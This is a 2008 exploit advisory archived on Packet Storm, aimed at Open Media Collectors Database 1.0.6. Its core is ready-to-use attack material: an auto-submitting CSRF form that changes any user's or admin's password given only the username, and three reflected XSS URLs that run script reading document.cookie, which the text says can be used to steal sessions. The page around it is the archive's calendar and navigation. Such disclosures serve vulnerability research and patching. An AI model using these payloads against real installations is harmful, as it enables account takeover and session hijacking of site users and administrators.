exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

omcd-xssxsrf.txt

omcd-xssxsrf.txt
Posted Aug 31, 2008
Authored by C1c4Tr1Z | Site lowsec.org

Open Media Collectors Database version 1.0.6 suffers from cross site scripting and cross site request forgery vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | dfd35a3d6068b0d371ba5e3422bef5afdb004d9e03f95c0561cd5d5f0cbb533d

omcd-xssxsrf.txt

Change Mirror Download
#=======================================================================#
.____ _________ ._.
| | ______ _ __/ _____/ ____ ____| |
| | / _ \ \/ \/ /\_____ \_/ __ \_/ ___\ |
| |__( <_> ) / / \ ___/\ \___\|
|_______ \____/ \/\_/ /_______ /\___ >\___ >_
\/ \/ \/ \/\/
(http://wwwlowsec.org)
#========================================================================#
Author: C1c4Tr1Z
Date: 28/08/08
Application: Open Media Collectors Database 1.0.6 (15/05/2007)
Product WebSite: http://opendb.iamvegan.net/

#========================================================================#
#============================[CSRF]======================================#

We can change any user or admin password by CSRF, only knowing the user's
username.

POC:

<form name="CSRF" method="POST" action="http://www.victim.com/dir_to_opmcd/user_admin.php">
<input type="hidden" name="user_id" value="USERNAME">
<input type="password" name="pwd" value="NEW_PASSWORD">
<input type="password" name="confirmpwd" value="NEW_PASSWORD">
<input type="hidden" name="redirect_link" value="">
<input type="hidden" name="redirect_url" value="">
<input type="hidden" name="op" value="update_password">
</form>
<script>CSRF.submit()</script>


#========================================================================#
#=============================[XSS]======================================#

With some JavaScript knowledge, we are able to execute JS codes to steal
cookies to use the sessions, or another changes/actions.

POC:

/user_admin.php?op=edit&user_id=<img/src/onerror=alert(document.cookie)>
/listings.php?search_list=y&linked_items=include&title_match=partial&title=<img/src/onerror=alert(document.cookie)>
*/user_profile.php?uid=[USERNAME]&subject=No+Subject&redirect_link=Back+to+Statistics&redirect_url=javascript:alert(document.cookie)

(*) This vector modifies the "Back to Statistics" (that we also can change),
and when the user clicks on the link, the javascript code is executed

#========================================================================#
#========================================================================#
Contact: C1c4Tr1Z <c1c4tr1z@lowsec.org>
(http://wwwlowsec.org)
LowSec! Web Application Security (Lab).
Deus ex Machina
#========================================================================#
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close